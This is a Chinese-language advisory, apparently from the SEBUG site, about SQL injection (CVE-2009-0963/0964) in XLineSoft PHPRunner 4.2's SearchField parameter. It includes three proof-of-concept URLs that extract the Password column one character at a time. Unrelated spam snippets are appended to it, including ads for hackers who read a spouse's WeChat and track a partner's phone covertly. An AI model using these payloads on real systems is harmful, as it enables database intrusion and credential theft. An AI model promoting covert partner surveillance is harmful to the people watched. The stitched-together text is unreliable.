影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964
PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。
PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:
XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--
知道不等于会,细节决定效果! 如果你的Adwords广告投放的效果不好,转化率低,肯定是你的广告设置的众多细节设置的不到位。这里给你分享几个技巧,可以给你带来两方面好处: 大幅度降低Adwor...
夫妻之间最重要的是信任。然而,现实中往往最缺乏的是夫妻之间的信任。在过去,人们习惯于在手机上打开信件和查看短消息。现在,随着科技的进步,他们已经检查了微信QQ的聊天记录。不久前发生的一件事可以说是非常...
黑客教你定位手机(黑客教你定位手机位置),小边是一位从事IT关联兼职的技术宅男。周末,他在家里感应无聊。他翻开手机上的Wi-Fi模块发掘,左近有近10个无线持续点,此中几个灯号强度都相对好。你为何不试...
用微信怎定位老公手机(微信偷偷定位不被发现),这只是诗,不是生存。若生存能够云云浪漫,辣么就不会有倒戈。有许多没有倒戈的婚配悲催。 用微信怎定位老公手机 1.就像堤坝没有被从天而降的暴雨冲垮同样,...
哪里可以找到查看聊天微信黑客(做并支付黑客联系信息)恨你的人有机会恢复吗?双方在第一次分手时都需要保持冷静。 哪里可以找到查看聊天微信黑客(先做再付黑客联系方式) 1.如果你在这个时候继续相互解释...
请教注册域名的步骤和详细做法 如果LZ要实惠一点的话,我本人建议在易名(ename.cn)比较好,到目前是我发现没有比这更实惠的域名注册商拉!(我本人单今年就在那注册了30多个,呵呵) 具体流。 步骤...